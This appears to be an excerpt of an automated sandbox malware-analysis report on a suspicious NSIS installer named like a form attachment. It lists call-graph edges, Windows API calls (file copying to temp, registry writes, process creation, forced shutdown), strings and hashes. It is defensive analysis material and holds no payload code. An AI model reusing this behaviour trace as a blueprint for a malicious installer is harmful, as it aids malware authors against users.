calls 4278->4282 4279->4269 4280->4236 4281 405d02 18 API calls 4281->4282 4282->4271 4282->4277 4282->4278 4282->4281 4284 4035bc CloseHandle 4282->4284 4394 405493 CreateProcessA 4282->4394 4284->4282 4285->4216 4286->4218 4288 405f4b 5 API calls 4287->4288 4289 4031f1 4288->4289 4290 4031fb 4289->4290 4291 405770 3 API calls 4289->4291 4290->4225 4292 403203 CreateDirectoryA 4291->4292 4400 4059a0 4292->4400 4404 405971 GetFileAttributesA CreateFileA 4295->4404 4297 402cbe 4324 402ccb 4297->4324 4405 405ce0 lstrcpynA 4297->4405 4299 402ce1 4300 4057b7 2 API calls 4299->4300 4301 402ce7 4300->4301 4406 405ce0 lstrcpynA 4301->4406 4303 402cf2 GetFileSize 4304 402df3 4303->4304 4305 402d09 4303->4305 4407 402bdc 4304->4407 4305->4304 4309 402e8e 4305->4309 4316 402bdc 33 API calls 4305->4316 4305->4324 4438 4031b8 4305->4438 4312 402bdc 33 API calls 4309->4312 4310 402e36 GlobalAlloc 4311 402e4d 4310->4311 4317 4059a0 2 API calls 4311->4317 4312->4324 4314 402e17 4315 4031b8 ReadFile 4314->4315 4318 402e22 4315->4318 4316->4305 4319 402e5e CreateFileA 4317->4319 4318->4310 4318->4324 4320 402e98 4319->4320 4319->4324 4422 4031ce SetFilePointer 4320->4422 4322 402ea6 4423 402f21 4322->4423 4324->4237 4324->4324 4326 40600b 3 API calls 4325->4326 4327 40377d 4326->4327 4328 403783 4327->4328 4329 403795 4327->4329 4479 405c3e wsprintfA 4328->4479 4330 405bc7 3 API calls 4329->4330 4331 4037c0 4330->4331 4332 4037de lstrcatA 4331->4332 4334 405bc7 3 API calls 4331->4334 4335 403793 4332->4335 4334->4332 4470 403a2e 4335->4470 4338 40585e 18 API calls 4339 403810 4338->4339 4340 403899 4339->4340 4342 405bc7 3 API calls 4339->4342 4341 40585e 18 API calls 4340->4341 4343 40389f 4341->4343 4351 40383c 4342->4351 4344 4038af LoadImageA 4343->4344 4347 405d02 18 API calls 4343->4347 4345 403955 4344->4345 4346 4038d6 RegisterClassA 4344->4346 4349 40140b 2 API calls 4345->4349 4348 40390c SystemParametersInfoA CreateWindowExA 4346->4348 4355 40395f 4346->4355 4347->4344 
4348->4345 4354 40395b 4349->4354 4350 403858 lstrlenA 4352 403866 lstrcmpiA 4350->4352 4353 40388c 4350->4353 4351->4340 4351->4350 4356 40579b CharNextA 4351->4356 4352->4353 4358 403876 GetFileAttributesA 4352->4358 4359 405770 3 API calls 4353->4359 4354->4355 4361 403a2e 19 API calls 4354->4361 4355->4236 4357 403856 4356->4357 4357->4350 4360 403882 4358->4360 4362 403892 4359->4362 4360->4353 4363 4057b7 2 API calls 4360->4363 4364 40396c 4361->4364 4480 405ce0 lstrcpynA 4362->4480 4363->4353 4366 403978 ShowWindow LoadLibraryA 4364->4366 4367 4039fb 4364->4367 4369 403997 LoadLibraryA 4366->4369 4370 40399e GetClassInfoA 4366->4370 4481 40509d OleInitialize 4367->4481 4369->4370 4372 4039b2 GetClassInfoA RegisterClassA 4370->4372 4373 4039c8 DialogBoxParamA 4370->4373 4371 403a01 4374 403a05 4371->4374 4375 403a1d 4371->4375 4372->4373 4376 40140b 2 API calls 4373->4376 4374->4355 4379 40140b 2 API calls 4374->4379 4378 40140b 2 API calls 4375->4378 4377 4039f0 4376->4377 4377->4355 4378->4355 4379->4355 4380->4223 4381->4268 4382->4240 4384 403692 4383->4384 4385 403688 CloseHandle 4383->4385 4386 4036a6 4384->4386 4387 40369c CloseHandle 4384->4387 4385->4384 4496 4036d4 4386->4496 4387->4386 4390 4055a0 71 API calls 4391 4034d8 OleUninitialize 4390->4391 4391->4246 4391->4247 4392->4261 4393->4282 4395 4054c2 CloseHandle 4394->4395 4396 4054ce 4394->4396 4395->4396 4396->4282 4398 401389 2 API calls 4397->4398 4399 401420 4398->4399 4399->4249 4401 4059ab GetTickCount GetTempFileNameA 4400->4401 4402 4059d8 4401->4402 4403 403217 4401->4403 4402->4401 4402->4403 4403->4225 4404->4297 4405->4299 4406->4303 4408 402c02 4407->4408 4409 402bea 4407->4409 4412 402c12 GetTickCount 4408->4412 4413 402c0a 4408->4413 4410 402bf3 DestroyWindow 4409->4410 4411 402bfa 4409->4411 4410->4411 4411->4310 4411->4324 4441 4031ce SetFilePointer 4411->4441 4412->4411 4415 402c20 4412->4415 4442 406044 4413->4442 4416 402c55 CreateDialogParamA ShowWindow 4415->4416 4417 
402c28 4415->4417 4416->4411 4417->4411 4446 402bc0 4417->4446 4419 402c36 wsprintfA 4420 404fcb 25 API calls 4419->4420 4421 402c53 4420->4421 4421->4411 4422->4322 4424 402f31 SetFilePointer 4423->4424 4425 402f4d 4423->4425 4424->4425 4449 40303c GetTickCount 4425->4449 4428 4059e9 ReadFile 4429 402f6d 4428->4429 4430 40303c 43 API calls 4429->4430 4434 402ff8 4429->4434 4431 402f84 4430->4431 4432 402ffe ReadFile 4431->4432 4431->4434 4435 402f94 4431->4435 4432->4434 4434->4324 4435->4434 4436 4059e9 ReadFile 4435->4436 4437 402fc7 WriteFile 4435->4437 4436->4435 4437->4434 4437->4435 4439 4059e9 ReadFile 4438->4439 4440 4031cb 4439->4440 4440->4305 4441->4314 4443 406061 PeekMessageA 4442->4443 4444 406071 4443->4444 4445 406057 DispatchMessageA 4443->4445 4444->4411 4445->4443 4447 402bd1 MulDiv 4446->4447 4448 402bcf 4446->4448 4447->4419 4448->4447 4450 4031a6 4449->4450 4451 40306b 4449->4451 4452 402bdc 33 API calls 4450->4452 4462 4031ce SetFilePointer 4451->4462 4458 402f54 4452->4458 4454 403076 SetFilePointer 4459 40309b 4454->4459 4455 4031b8 ReadFile 4455->4459 4457 402bdc 33 API calls 4457->4459 4458->4428 4458->4434 4459->4455 4459->4457 4459->4458 4460 403130 WriteFile 4459->4460 4461 403187 SetFilePointer 4459->4461 4463 40610b 4459->4463 4460->4458 4460->4459 4461->4450 4462->4454 4464 406130 4463->4464 4467 406138 4463->4467 4464->4459 4465 4061c8 GlobalAlloc 4465->4464 4465->4467 4466 4061bf GlobalFree 4466->4465 4467->4464 4467->4465 4467->4466 4468 406236 GlobalFree 4467->4468 4469 40623f GlobalAlloc 4467->4469 4468->4469 4469->4464 4469->4467 4471 403a42 4470->4471 4488 405c3e wsprintfA 4471->4488 4473 403ab3 4474 405d02 18 API calls 4473->4474 4475 403abf SetWindowTextA 4474->4475 4476 4037ee 4475->4476 4477 403adb 4475->4477 4476->4338 4477->4476 4478 405d02 18 API calls 4477->4478 4478->4477 4479->4335 4480->4340 4489 40401a 4481->4489 4483 4050e7 4485 40401a SendMessageA 4483->4485 4484 4050c0 4484->4483 4492 401389 4484->4492 4486 
4050f9 OleUninitialize 4485->4486 4486->4371 4488->4473 4490 404032 4489->4490 4491 404023 SendMessageA 4489->4491 4490->4484 4491->4490 4494 401390 4492->4494 4493 4013fe 4493->4484 4494->4493 4495 4013cb MulDiv SendMessageA 4494->4495 4495->4494 4497 4036e2 4496->4497 4498 4036ab 4497->4498 4499 4036e7 FreeLibrary GlobalFree 4497->4499 4498->4390 4499->4498 4499->4499 4500 40251b 4501 4029e2 18 API calls 4500->4501 4506 402525 4501->4506 4502 40258f 4503 4059e9 ReadFile 4503->4506 4504 402591 4509 405c3e wsprintfA 4504->4509 4505 4025a1 4505->4502 4508 4025b7 SetFilePointer 4505->4508 4506->4502 4506->4503 4506->4504 4506->4505 4508->4502 4509->4502 4510 40231e 4511 402324 4510->4511 4512 4029ff 18 API calls 4511->4512 4513 402336 4512->4513 4514 4029ff 18 API calls 4513->4514 4515 402340 RegCreateKeyExA 4514->4515 4516 402665 4515->4516 4517 40236a 4515->4517 4518 402382 4517->4518 4519 4029ff 18 API calls 4517->4519 4520 40238e 4518->4520 4523 4029e2 18 API calls 4518->4523 4522 40237b lstrlenA 4519->4522 4521 4023a9 RegSetValueExA 4520->4521 4524 402f21 46 API calls 4520->4524 4525 4023bf RegCloseKey 4521->4525 4522->4518 4523->4520 4524->4521 4525->4516 5516 40261e 5517 402621 5516->5517 5519 402639 5516->5519 5520 40262e FindNextFileA 5517->5520 5518 4027bf 5519->5518 5522 405ce0 lstrcpynA 5519->5522 5520->5519 5522->5518 5530 100010e0 5531 1000110e 5530->5531 5532 1000123b 3 API calls 5531->5532 5535 1000111e 5532->5535 5533 100011c4 GlobalFree 5534 100012bf 2 API calls 5534->5535 5535->5533 5535->5534 5536 100011c3 5535->5536 5537 1000123b 3 API calls 5535->5537 5538 10001278 2 API calls 5535->5538 5539 10001155 GlobalAlloc 5535->5539 5540 100011ea GlobalFree 5535->5540 5541 100011b1 GlobalFree 5535->5541 5542 100012e8 lstrcpyA 5535->5542 5536->5533 5537->5535 5538->5541 5539->5535 5540->5535 5541->5535 5542->5535 5543 4016a1 5544 4029ff 18 API calls 5543->5544 5545 4016a7 GetFullPathNameA 5544->5545 5546 4016be 5545->5546 5552 4016df 5545->5552 5549 
405fe4 2 API calls 5546->5549 5546->5552 5547 4016f3 GetShortPathNameA 5548 402894 5547->5548 5550 4016cf 5549->5550 5550->5552 5553 405ce0 lstrcpynA 5550->5553 5552->5547 5552->5548 5553->5552 5554 100029e3 5555 100029fb 5554->5555 5556 10001551 2 API calls 5555->5556 5557 10002a16 5556->5557 4527 401d26 GetDC GetDeviceCaps 4528 4029e2 18 API calls 4527->4528 4529 401d44 MulDiv ReleaseDC 4528->4529 4530 4029e2 18 API calls 4529->4530 4531 401d63 4530->4531 4532 405d02 18 API calls 4531->4532 4533 401d9c CreateFontIndirectA 4532->4533 4534 4024cd 4533->4534 5558 403727 5559 403732 5558->5559 5560 403736 5559->5560 5561 403739 GlobalAlloc 5559->5561 5561->5560 4730 40172c 4731 4029ff 18 API calls 4730->4731 4732 401733 4731->4732 4733 4059a0 2 API calls 4732->4733 4734 40173a 4733->4734 4735 4059a0 2 API calls 4734->4735 4735->4734 4736 401dac 4737 4029e2 18 API calls 4736->4737 4738 401db2 4737->4738 4739 4029e2 18 API calls 4738->4739 4740 401dbb 4739->4740 4741 401dc2 ShowWindow 4740->4741 4742 401dcd EnableWindow 4740->4742 4743 402894 4741->4743 4742->4743 5562 401eac 5563 4029ff 18 API calls 5562->5563 5564 401eb3 5563->5564 5565 405fe4 2 API calls 5564->5565 5566 401eb9 5565->5566 5568 401ecb 5566->5568 5569 405c3e wsprintfA 5566->5569 5569->5568 5570 40192d 5571 4029ff 18 API calls 5570->5571 5572 401934 lstrlenA 5571->5572 5573 4024cd 5572->5573 5581 401cb0 5582 4029e2 18 API calls 5581->5582 5583 401cc0 SetWindowLongA 5582->5583 5584 402894 5583->5584 5585 401a31 5586 4029e2 18 API calls 5585->5586 5587 401a37 5586->5587 5588 4029e2 18 API calls 5587->5588 5589 4019e1 5588->5589 5590 4024b1 5591 4029ff 18 API calls 5590->5591 5592 4024b8 5591->5592 5595 405971 GetFileAttributesA CreateFileA 5592->5595 5594 4024c4 5595->5594 4750 401e32 4751 4029ff 18 API calls 4750->4751 4752 401e38 4751->4752 4753 404fcb 25 API calls 4752->4753 4754 401e42 4753->4754 4755 405493 2 API calls 4754->4755 4759 401e48 4755->4759 4756 401e9e CloseHandle 4758 402665 4756->4758 
4757 401e67 WaitForSingleObject 4757->4759 4760 401e75 GetExitCodeProcess 4757->4760 4759->4756 4759->4757 4759->4758 4763 406044 2 API calls 4759->4763 4761 401e92 4760->4761 4762 401e87 4760->4762 4761->4756 4765 401e90 4761->4765 4766 405c3e wsprintfA 4762->4766 4763->4757 4765->4756 4766->4765 4767 4015b3 4768 4029ff 18 API calls 4767->4768 4769 4015ba 4768->4769 4770 405809 4 API calls 4769->4770 4782 4015c2 4770->4782 4771 40160a 4773 401638 4771->4773 4774 40160f 4771->4774 4772 40579b CharNextA 4776 4015d0 CreateDirectoryA 4772->4776 4777 401423 25 API calls 4773->4777 4775 401423 25 API calls 4774->4775 4778 401616 4775->4778 4779 4015e5 GetLastError 4776->4779 4776->4782 4784 401630 4777->4784 4785 405ce0 lstrcpynA 4778->4785 4781 4015f2 GetFileAttributesA 4779->4781 4779->4782 4781->4782 4782->4771 4782->4772 4783 401621 SetCurrentDirectoryA 4783->4784 4785->4783 4786 402036 4787 4029ff 18 API calls 4786->4787 4788 40203d 4787->4788 4789 4029ff 18 API calls 4788->4789 4790 402047 4789->4790 4791 4029ff 18 API calls 4790->4791 4792 402051 4791->4792 4793 4029ff 18 API calls 4792->4793 4794 40205b 4793->4794 4795 4029ff 18 API calls 4794->4795 4796 402065 4795->4796 4797 40207b CoCreateInstance 4796->4797 4798 4029ff 18 API calls 4796->4798 4801 40209a 4797->4801 4803 40214f 4797->4803 4798->4797 4799 401423 25 API calls 4800 402183 4799->4800 4802 402131 MultiByteToWideChar 4801->4802 4801->4803 4802->4803 4803->4799 4803->4800 5596 4014b7 5597 4014bd 5596->5597 5598 401389 2 API calls 5597->5598 5599 4014c5 5598->5599 4804 401bb8 4805 4029e2 18 API calls 4804->4805 4806 401bbf 4805->4806 4807 4029e2 18 API calls 4806->4807 4808 401bc9 4807->4808 4809 401bd9 4808->4809 4810 4029ff 18 API calls 4808->4810 4811 401be9 4809->4811 4812 4029ff 18 API calls 4809->4812 4810->4809 4813 401bf4 4811->4813 4814 401c38 4811->4814 4812->4811 4815 4029e2 18 API calls 4813->4815 4816 4029ff 18 API calls 4814->4816 4818 401bf9 4815->4818 4817 401c3d 4816->4817 4819 
4029ff 18 API calls 4817->4819 4820 4029e2 18 API calls 4818->4820 4821 401c46 FindWindowExA 4819->4821 4822 401c02 4820->4822 4825 401c64 4821->4825 4823 401c28 SendMessageA 4822->4823 4824 401c0a SendMessageTimeoutA 4822->4824 4823->4825 4824->4825 5600 10002179 5601 100021de 5600->5601 5603 10002214 5600->5603 5602 100021f0 GlobalAlloc 5601->5602 5601->5603 5602->5601 5604 4062ba 5605 40613e 5604->5605 5606 406aa9 5605->5606 5607 4061c8 GlobalAlloc 5605->5607 5608 4061bf GlobalFree 5605->5608 5609 406236 GlobalFree 5605->5609 5610 40623f GlobalAlloc 5605->5610 5607->5605 5607->5606 5608->5607 5609->5610 5610->5605 5610->5606 4826 40243c 4827 402b09 19 API calls 4826->4827 4828 402446 4827->4828 4829 4029e2 18 API calls 4828->4829 4830 40244f 4829->4830 4831 402472 RegEnumValueA 4830->4831 4832 402466 RegEnumKeyA 4830->4832 4834 402665 4830->4834 4833 40248b RegCloseKey 4831->4833 4831->4834 4832->4833 4833->4834 4836 40223d 4837 402245 4836->4837 4838 40224b 4836->4838 4840 4029ff 18 API calls 4837->4840 4839 40225b 4838->4839 4841 4029ff 18 API calls 4838->4841 4842 402269 4839->4842 4843 4029ff 18 API calls 4839->4843 4840->4838 4841->4839 4844 4029ff 18 API calls 4842->4844 4843->4842 4845 402272 WritePrivateProfileStringA 4844->4845 4846 40173f 4847 4029ff 18 API calls 4846->4847 4848 401746 4847->4848 4849 401764 4848->4849 4850 40176c 4848->4850 4886 405ce0 lstrcpynA 4849->4886 4887 405ce0 lstrcpynA 4850->4887 4853 401777 4855 405770 3 API calls 4853->4855 4854 40176a 4857 405f4b 5 API calls 4854->4857 4856 40177d lstrcatA 4855->4856 4856->4854 4864 401789 4857->4864 4858 405fe4 2 API calls 4858->4864 4859 4017ca 4860 40594c 2 API calls 4859->4860 4860->4864 4862 4017a0 CompareFileTime 4862->4864 4863 401864 4865 404fcb 25 API calls 4863->4865 4864->4858 4864->4859 4864->4862 4864->4863 4867 405ce0 lstrcpynA 4864->4867 4873 405d02 18 API calls 4864->4873 4882 4054f4 MessageBoxIndirectA 4864->4882 4883 40183b 4864->4883 4885 405971 GetFileAttributesA 
CreateFileA 4864->4885 4868 40186e 4865->4868 4866 404fcb 25 API calls 4872 401850 4866->4872 4867->4864 4869 402f21 46 API calls 4868->4869 4871 401881 4869->4871 4870 401895 SetFileTime 4874 4018a7 CloseHandle 4870->4874 4871->4870 4871->4874 4873->4864 4874->4872 4875 4018b8 4874->4875 4876 4018d0 4875->4876 4877 4018bd 4875->4877 4879 405d02 18 API calls 4876->4879 4878 405d02 18 API calls 4877->4878 4880 4018c5 lstrcatA 4878->4880 4881 4018d8 4879->4881 4880->4881 4884 4054f4 MessageBoxIndirectA 4881->4884 4882->4864 4883->4866 4883->4872 4884->4872 4885->4864 4886->4854 4887->4853 5611 40163f 5612 4029ff 18 API calls 5611->5612 5613 401645 5612->5613 5614 405fe4 2 API calls 5613->5614 5615 40164b 5614->5615 5616 404f3f 5617 404f63 5616->5617 5618 404f4f 5616->5618 5620 404f6b IsWindowVisible 5617->5620 5624 404f82 5617->5624 5619 404f55 5618->5619 5628 404fac 5618->5628 5622 40401a SendMessageA 5619->5622 5623 404f78 5620->5623 5620->5628 5621 404fb1 CallWindowProcA 5625 404f5f 5621->5625 5622->5625 5626 404896 5 API calls 5623->5626 5624->5621 5627 404916 4 API calls 5624->5627 5626->5624 5627->5628 5628->5621 5629 40193f 5630 4029e2 18 API calls 5629->5630 5631 401946 5630->5631 5632 4029e2 18 API calls 5631->5632 5633 401950 5632->5633 5634 4029ff 18 API calls 5633->5634 5635 401959 5634->5635 5636 40196c lstrlenA 5635->5636 5638 4019a7 5635->5638 5637 401976 5636->5637 5637->5638 5642 405ce0 lstrcpynA 5637->5642 5640 401990 5640->5638 5641 40199d lstrlenA 5640->5641 5641->5638 5642->5640

Control-flow Graph (function 00403219)
APIs
• #17.COMCTL32 ref: 0040323A
• SetErrorMode.KERNELBASE(00008001), ref: 00403245
• OleInitialize.OLE32(00000000), ref: 0040324C
  • Part of subcall function 0040600B: GetModuleHandleA.KERNEL32(?,?,?,0040325E,00000008), ref: 0040601D
  • Part of subcall function 0040600B: LoadLibraryA.KERNELBASE(?,?,?,0040325E,00000008), ref: 00406028
  • Part of subcall function 0040600B: GetProcAddress.KERNEL32(00000000,?), ref: 00406039
• SHGetFileInfoA.SHELL32(0041ECA0,00000000,?,00000160,00000000,00000008), ref: 00403274
  • Part of subcall function 00405CE0: lstrcpynA.KERNEL32(?,?,00000400,00403289,Centraleuropisk Setup,NSIS Error), ref: 00405CED
• GetCommandLineA.KERNEL32(Centraleuropisk Setup,NSIS Error), ref: 00403289
• GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe",00000000), ref: 0040329C
• CharNextA.USER32(00000000,"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe",00000020), ref: 004032C7
• GetTempPathA.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020), ref: 004033C4
• GetWindowsDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 004033D5
• lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004033E1
• GetTempPathA.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004033F5
• lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 004033FD
• SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 0040340E
• SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 00403416
• DeleteFileA.KERNELBASE(1033), ref: 0040342A
• OleUninitialize.OLE32(?), ref: 004034D8
• ExitProcess.KERNEL32 ref: 004034F8
• lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe",00000000,?), ref: 00403504
• lstrcmpiA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 00403510
• CreateDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 0040351C
• SetCurrentDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\), ref: 00403523
• DeleteFileA.KERNEL32(0041E8A0,0041E8A0,?,00424000,?), ref: 0040357C
• CopyFileA.KERNEL32(C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe,0041E8A0,?), ref: 00403590
• CloseHandle.KERNEL32(00000000,0041E8A0,0041E8A0,?,0041E8A0,00000000), ref: 004035BD
• GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,?), ref: 00403612
                                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 0040364E
                                                                                                              • ExitProcess.KERNEL32 ref: 00403671
Strings
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
• String ID: "$"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry$C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen$C:\Users\user\Desktop$C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe$Centraleuropisk Setup$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
• API String ID: 4107622049-4215202488
• Opcode ID: b395d4fddee78296a5d69c8e442308374256a494fb247fe93a3a0ba23709092c
• Instruction ID: 7fa91be0df980d7df711fed2a4ed052ffc20252d69ef6f5c306a31a697f91405
• Opcode Fuzzy Hash: b395d4fddee78296a5d69c8e442308374256a494fb247fe93a3a0ba23709092c
• Instruction Fuzzy Hash: C5B117706083516EE7216F659D4DA2B3EACAB45306F44447FF4817A2E2C77C9E01CB6E

Control-flow Graph (graph image omitted; legend: Executed / Not Executed; raw edge list not reproduced)
APIs
• GetVersion.KERNEL32(?,0041F4C0,00000000,00405003,0041F4C0,00000000), ref: 00405DB3
• GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E2E
• GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405E41
• SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405E7D
• SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00405E8B
• CoTaskMemFree.OLE32(00000000), ref: 00405E96
• lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EB8
• lstrlenA.KERNEL32(Call,?,0041F4C0,00000000,00405003,0041F4C0,00000000), ref: 00405F0A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
• String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
• API String ID: 900638850-1230650788
• Opcode ID: 9c9f665194e8c5a47c6686974ba84a3b90d63e75829e45763daa2bd1b12ed63f
• Instruction ID: 2b293d25366fc547a30ad863a8204623ae8d1739f01cc20b9afdcfd3690b1d74
• Opcode Fuzzy Hash: 9c9f665194e8c5a47c6686974ba84a3b90d63e75829e45763daa2bd1b12ed63f
• Instruction Fuzzy Hash: 46611271A04A05AAEB215F24EC88BBF3B68EB15310F10813BE541B62D1D37D4A42DF9E

Control-flow Graph (graph image omitted; legend: Executed / Not Executed; raw edge list not reproduced)
APIs
• DeleteFileA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 004055C9
• lstrcatA.KERNEL32(00420CE8,\*.*,00420CE8,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405611
• lstrcatA.KERNEL32(?,00409014,?,00420CE8,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405632
• lstrlenA.KERNEL32(?,?,00409014,?,00420CE8,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405638
• FindFirstFileA.KERNELBASE(00420CE8,?,?,?,00409014,?,00420CE8,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405649
• FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004056F6
• FindClose.KERNEL32(00000000), ref: 00405707
Strings
• C:\Users\user~1\AppData\Local\Temp\, xrefs: 004055AE
• \*.*, xrefs: 0040560B
• "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe", xrefs: 004055A0
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• String ID: "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
• API String ID: 2035342205-128552741
• Opcode ID: b64be4ea1155d549a92e54fdb5038b20d055016f2d82b64bdc1b1eb88874929d
• Instruction ID: be8413790da27f3485791dfb71ea9e97d61aa92783f5c3743ff415ab50f27cdc
• Opcode Fuzzy Hash: b64be4ea1155d549a92e54fdb5038b20d055016f2d82b64bdc1b1eb88874929d
• Instruction Fuzzy Hash: 6851DE70904A04BAEB217A258D45BAF7AB8DF42714F54453BF404762D2C73C4D82EEAE

Control-flow Graph (graph image omitted; legend: Executed / Not Executed; raw edge list not reproduced)
APIs
• GetModuleHandleA.KERNELBASE(00000000,?,000000F0), ref: 00401F93
  • Part of subcall function 00404FCB: lstrlenA.KERNEL32(0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000,?), ref: 00405004
  • Part of subcall function 00404FCB: lstrlenA.KERNEL32(00402C53,0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000), ref: 00405014
  • Part of subcall function 00404FCB: lstrcatA.KERNEL32(0041F4C0,00402C53,00402C53,0041F4C0,00000000,00000000,00000000), ref: 00405027
  • Part of subcall function 00404FCB: SetWindowTextA.USER32(0041F4C0,0041F4C0), ref: 00405039
  • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505F
  • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405079
  • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405087
• LoadLibraryExA.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00401FA3
• GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
• FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 0040201D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                              • String ID: `7B
                                                                                                              • API String ID: 2987980305-3208876730
                                                                                                              • Opcode ID: 0daab70ef89e1fffc4ee8cd0b655ea48e2dbfae681ea0e692f382ac82c4be43c
                                                                                                              • Instruction ID: 4f0a164b3c96300c60f35f0977c0e3ddcb7ae723504d3d42d940096a5cee0e9b
                                                                                                              • Opcode Fuzzy Hash: 0daab70ef89e1fffc4ee8cd0b655ea48e2dbfae681ea0e692f382ac82c4be43c
                                                                                                              • Instruction Fuzzy Hash: CA21EB72D04215FACF207FA48E4DA6E79B0AB4435CF20423BF601B62E0D7BD4942DA5E
APIs
• CoCreateInstance.OLE32(00407384,?,?,00407374,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040208C
• MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,00407374,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402145
Strings
